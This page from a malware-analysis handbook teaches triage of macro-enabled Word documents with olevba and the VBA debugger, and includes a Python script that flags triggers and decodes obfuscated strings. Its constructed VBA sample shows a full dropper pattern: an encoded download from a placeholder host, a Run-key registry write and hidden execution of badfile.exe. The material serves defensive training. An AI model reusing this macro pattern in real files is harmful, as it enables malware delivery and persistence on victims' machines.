Malware Handbook

Analyzing Macro Code in Office Documents

Last updated 9 months ago

Tools Used:

  1. Oletools (OLEVBA): A Python-based suite of tools used to analyze and extract VBA source code from Office documents.

  2. Microsoft Word: Used to debug macro code through the VBA Developer Tools.

Steps for Analyzing Macro-Enabled Documents:

  1. Initial Setup:

    • Revert the VM snapshot, copy the course files, and start FakeNet.

    • Open the command prompt in the folder where the sample document is located.

  2. Static Analysis with OLEVBA:

    • Execute the command olevba re_test_dlx.doc to analyze the document.

    • OLEVBA provides a summary of the analysis, including potential trigger points such as Auto_Open and Document_Open.

    • Redirect the output to a text file for easier navigation: olevba re_test_dlx.doc > olevba_result.txt.

    • Key Points to Analyze:

      • Focus on trigger points like Auto_Open and Document_Open.

      • Inspect the code for functions like MsgBox (displays a message), internet connections, registry modifications, and file executions.

  3. Understanding the Macro Code:

    • Analyze the flow of the macro:

      • The macro might display a message, connect to the internet, create a registry entry, and finally execute a file.

    • Pay attention to the usage of functions like RegWrite (registry modification) and Shell (command execution).

    • Look for obfuscation techniques, such as a custom helper function (here named avg) that strings are passed through before use; this usually indicates encrypted or encoded strings.

  4. Dynamic Analysis with Microsoft Word:

    • Open the document in Microsoft Word (e.g., Word 2013).

    • Setting Breakpoints:

      • Use Alt + F11 to open the VBA Developer Window.

      • Navigate to the Document_Open subroutine and insert an End statement so the macro stops instead of running to completion as soon as it is triggered.

      • Set a breakpoint at the first line of the subroutine.

    • Debugging:

      • Enable macro content in the Word document to trigger execution.

      • Return to the VBA editor and step through the code using F8.

      • Use Shift + F8 to step over decryption functions you do not need to trace line by line, but make sure you understand the decryption algorithm itself.

      • Use the Watch Window to monitor variables and expressions, especially to observe decrypted text or key indicators of compromise (IOCs).

  5. Key Observations:

    • Identify network activity, such as GET requests and the corresponding URLs.

    • Detect the creation of persistent mechanisms (e.g., writing to the registry).

    • Observe any execution of downloaded or created files, such as badfile.exe.
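
As an added example (not part of these notes or the course files), the following Python script performs the static triage of steps 2 and 3 on VBA text of the kind OLEVBA extracts: it lists procedures, flags trigger points, records the lines where MsgBox, RegWrite, Shell and CreateObject appear, and mirrors the sample's avg helper so the string it hides is revealed without stepping through it in Word. The VBA source, the avg decoder (a one-character shift) and the URL and path values are constructed placeholders, not taken from re_test_dlx.doc.

```python
import re

# Constructed VBA standing in for what `olevba re_test_dlx.doc` would dump; it is
# not the real sample. avg() shifts each character back by one (a placeholder decoder).
SAMPLE_VBA = r"""Private Function avg(s As String) As String
    For i = 1 To Len(s)
        r = r & Chr(Asc(Mid(s, i, 1)) - 1)
    Next i
    avg = r
End Function

Private Sub Document_Open()
    MsgBox "Please wait..."
    u = avg("iuuq;00fybnqmf/jowbmje0cbegjmf/fyf")
    Set x = CreateObject("MSXML2.XMLHTTP")
    x.Open "GET", u, False
    Set w = CreateObject("WScript.Shell")
    w.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater", "C:\Temp\badfile.exe"
    Shell "C:\Temp\badfile.exe", vbHide
End Sub
"""

PROC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(Sub|Function)\s+(\w+)", re.M)
URL_RE = re.compile(r"https?://[^\s\"']+")
TRIGGERS = {"Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open", "AutoExec"}
INDICATORS = {  # keyword -> regex; the lookbehind keeps WScript.Shell from counting as Shell
    "MsgBox": r"\bMsgBox\b",
    "RegWrite": r"\bRegWrite\b",
    "Shell": r"(?<![.\w])Shell\b",
    "CreateObject": r"\bCreateObject\b",
    "exe_path": r'"[^"]*\.exe"',
}

def avg_decode(s: str) -> str:
    # Python mirror of the sample's avg() helper, so decoded strings show up statically
    return "".join(chr(ord(c) - 1) for c in s)

def triage(src: str) -> dict:
    # Triggers, candidate decoder helpers, indicator line numbers, decoded strings, URLs
    lines = src.splitlines()
    procs = [name for _, name in PROC_RE.findall(src)]
    hits = {key: [n for n, line in enumerate(lines, 1) if re.search(pat, line)]
            for key, pat in INDICATORS.items()}
    decoded = [avg_decode(m) for m in re.findall(r'avg\("([^"]*)"\)', src)]
    urls = URL_RE.findall(src) + [d for d in decoded if URL_RE.fullmatch(d)]
    return {"procedures": procs,
            "triggers": [p for p in procs if p in TRIGGERS],
            "helpers": [p for p in procs if p not in TRIGGERS],
            "indicators": {k: v for k, v in hits.items() if v},
            "decoded_strings": decoded, "urls": urls}
```

Run `triage(SAMPLE_VBA)` to get the report; the line numbers it returns point back into the extracted VBA text, which is where you set breakpoints in step 4.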

Summary:

  • OLEVBA is used for static analysis, helping to identify key functions and trigger points within the macro code.

  • Microsoft Word's VBA Editor is essential for dynamic analysis, allowing step-by-step debugging to understand the macro's behavior fully.

  • Key techniques include setting breakpoints, skipping unnecessary decryption steps, and using the Watch Window to monitor variables and expressions.

These notes cover the fundamental steps and observations when analyzing macro-enabled Word documents for potential malicious activity.